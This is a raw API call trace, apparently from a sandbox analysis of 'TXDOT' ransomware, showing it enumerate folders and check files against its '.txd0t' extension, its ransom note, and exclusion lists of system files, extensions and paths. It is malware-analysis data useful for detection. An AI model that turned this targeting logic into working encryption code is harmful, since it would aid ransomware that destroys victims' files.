[0117.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0117.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0117.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0117.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0117.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0117.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0117.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0117.138] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x58d2d05e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1aa5, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0117.138] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0117.138] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0117.138] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\3076", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0117.138] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\") returned="C:\\588bce7c90097ed212\\3076\\" [0117.138] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\3076\\eula.rtf.txd0t" [0117.138] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0117.138] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.139] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x58d9f6dc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xef90, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0117.139] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0117.139] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0117.139] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\3076", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0117.139] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\") returned="C:\\588bce7c90097ed212\\3076\\" [0117.139] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.txd0t" [0117.139] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0117.139] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.139] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0117.139] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0117.139] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0117.139] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\3076", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0117.139] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\") returned="C:\\588bce7c90097ed212\\3076\\" [0117.139] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\3076\\SetupResources.dll" [0117.139] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0117.139] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0117.139] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0117.139] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0117.139] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0117.139] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0117.139] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0117.139] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0117.139] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0117.139] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0117.139] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0117.139] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0117.139] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0117.139] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0117.139] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0117.139] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.139] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0117.139] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.139] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0117.140] FindClose (in: hFindFile=0xec2030 | out: hFindFile=0xec2030) returned 1 [0117.140] GetProcessHeap () returned 0xe30000 [0117.140] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0117.140] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58e37f09, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58e37f09, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0117.140] StrCmpW (psz1="3082", psz2=".") returned 1 [0117.140] StrCmpW (psz1="3082", psz2="..") returned 1 [0117.140] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.140] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.140] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="3082", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0117.140] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\windows\\system32\\") returned 0x0 [0117.140] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\windows\\syswow64\\") returned 0x0 [0117.140] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\windows\\system\\") returned 0x0 [0117.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\windows\\winsxs\\") returned 0x0 [0117.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\appdata\\roaming\\") returned 0x0 [0117.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\appdata\\local\\") returned 0x0 [0117.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\appdata\\locallow\\") returned 0x0 [0117.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\all users\\microsoft\\") returned 0x0 [0117.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="\\inetpub\\logs\\") returned 0x0 [0117.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\boot\\") returned 0x0 [0117.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\perflogs\\") returned 0x0 [0117.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\programdata\\") returned 0x0 [0117.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\drivers\\") returned 0x0 [0117.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\wsus\\") returned 0x0 [0117.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\efstmpwp\\") returned 0x0 [0117.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch=":\\$recycle.bin\\") returned 0x0 [0117.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="crypt_detect") returned 0x0 [0117.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="cryptolocker") returned 0x0 [0117.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="ransomware") returned 0x0 [0117.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="C:\\WINDOWS") returned 0x0 [0117.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="C:\\Program Files (x86)") returned 0x0 [0117.156] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3082", lpSrch="C:\\Program Files") returned 0x0 [0117.156] GetProcessHeap () returned 0xe30000 [0117.156] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0117.156] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\3082", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0117.156] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\*") returned="C:\\588bce7c90097ed212\\3082\\*" [0117.157] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58e37f09, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58e37f09, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1a70 [0117.157] StrCmpW (psz1=".", psz2=".") returned 0 [0117.157] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58e37f09, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58e37f09, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0117.157] StrCmpW (psz1="..", psz2=".") returned 1 [0117.157] StrCmpW (psz1="..", psz2="..") returned 0 [0117.157] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58d06c80, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x58d06c80, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58d530db, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0117.157] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0117.157] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0117.157] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\3082", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0117.157] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\") returned="C:\\588bce7c90097ed212\\3082\\" [0117.157] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\3082\\!TXDOT_READ_ME!.txt" [0117.157] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0117.157] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0117.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0117.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0117.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0117.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0117.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0117.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0117.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0117.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0117.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0117.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0117.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0117.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0117.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0117.157] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0117.158] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x58d06c80, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xdfd, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0117.158] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0117.158] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0117.158] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\3082", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0117.158] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\") returned="C:\\588bce7c90097ed212\\3082\\" [0117.158] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\3082\\eula.rtf.txd0t" [0117.158] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0117.158] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.158] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x58e37f09, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13a7c, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0117.158] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0117.158] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0117.158] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\3082", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0117.158] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\") returned="C:\\588bce7c90097ed212\\3082\\" [0117.158] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml.txd0t" [0117.158] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0117.158] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.158] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0117.158] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0117.158] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0117.158] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\3082", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082") returned="C:\\588bce7c90097ed212\\3082" [0117.158] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\") returned="C:\\588bce7c90097ed212\\3082\\" [0117.158] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3082\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" [0117.158] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0117.158] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0117.158] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0117.158] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0117.158] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0117.158] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0117.158] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0117.158] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0117.158] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0117.158] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0117.158] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0117.159] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0117.159] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0117.159] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0117.166] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0117.166] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.166] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0117.166] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.174] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0117.174] FindClose (in: hFindFile=0xec1a70 | out: hFindFile=0xec1a70) returned 1 [0117.186] GetProcessHeap () returned 0xe30000 [0117.186] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0117.186] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58eaa853, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58eaa853, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Client", cAlternateFileName="")) returned 1 [0117.194] StrCmpW (psz1="Client", psz2=".") returned 1 [0117.194] StrCmpW (psz1="Client", psz2="..") returned 1 [0117.194] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.194] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.194] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Client", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Client") returned="C:\\588bce7c90097ed212\\Client" [0117.194] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\windows\\system32\\") returned 0x0 [0117.194] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\windows\\syswow64\\") returned 0x0 [0117.194] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\windows\\system\\") returned 0x0 [0117.194] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\windows\\winsxs\\") returned 0x0 [0117.194] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\appdata\\roaming\\") returned 0x0 [0117.194] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\appdata\\local\\") returned 0x0 [0117.194] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\appdata\\locallow\\") returned 0x0 [0117.194] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\all users\\microsoft\\") returned 0x0 [0117.194] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="\\inetpub\\logs\\") returned 0x0 [0117.194] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\boot\\") returned 0x0 [0117.194] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\perflogs\\") returned 0x0 [0117.194] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\programdata\\") returned 0x0 [0117.266] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\drivers\\") returned 0x0 [0117.274] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\wsus\\") returned 0x0 [0117.274] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\efstmpwp\\") returned 0x0 [0117.274] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch=":\\$recycle.bin\\") returned 0x0 [0117.275] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="crypt_detect") returned 0x0 [0117.282] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="cryptolocker") returned 0x0 [0117.282] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="ransomware") returned 0x0 [0117.282] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="C:\\WINDOWS") returned 0x0 [0117.282] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="C:\\Program Files (x86)") returned 0x0 [0117.290] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Client", lpSrch="C:\\Program Files") returned 0x0 [0117.290] 